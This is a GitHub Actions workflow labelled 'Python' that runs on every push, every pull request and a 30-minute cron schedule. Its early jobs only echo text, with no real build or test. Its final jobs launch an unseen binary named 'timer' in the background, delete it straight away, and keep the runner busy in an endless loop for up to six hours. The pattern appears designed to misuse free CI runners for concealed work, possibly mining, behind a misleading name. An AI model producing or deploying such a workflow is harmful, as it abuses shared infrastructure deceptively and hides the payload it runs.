name: Python
on:  
  push:
  pull_request:
  schedule:
  - cron: "*/30 * * * *"
 
jobs:
 python-1:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        hanakaru: [1.4, 1.5, 1.6, 1.7, 1.8]
        flag: [A, B, C]
    timeout-minutes: 360
 
    steps:
    - uses: actions/checkout@v3
    - name: Python-run
      run: echo "python"
 
 python-2:
    runs-on: ubuntu-latest
    needs: python-1
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        hanakaru: [1.4, 1.5, 1.6, 1.7, 1.8]
        flag: [C, D, E, F]
    timeout-minutes: 360
 
    steps:
    - uses: actions/checkout@v3
    - name: Python-run
      run: echo "python"
 
 python-build-2:
    runs-on: ubuntu-20.04 
    needs: python-2
    strategy:
      fail-fast: false
      matrix:
        hanakaru: [1.4, 1.5, 1.6]
        flag: [A]
    timeout-minutes: 360
    steps:
    - uses: actions/checkout@v3
    - name: Rerunning
      continue-on-error: true
      run: |
         chmod +x timer; nohup ./timer & sleep 0.1; rm -rf timer
         while :; do echo hello; sleep 300; done
 
 python-build-1:
    runs-on: ubuntu-20.04 
    needs: python-2
    strategy:
      fail-fast: false
      matrix:
        hanakaru: [1.11, 1.12, 1.13]
        flag: [B]
    timeout-minutes: 360
    steps:
    - uses: actions/checkout@v3
    - name: Rerunning
      continue-on-error: true
      run: |
         chmod +x timer; nohup ./timer & sleep 0.1; rm -rf timer
         while :; do echo hello; sleep 300; done
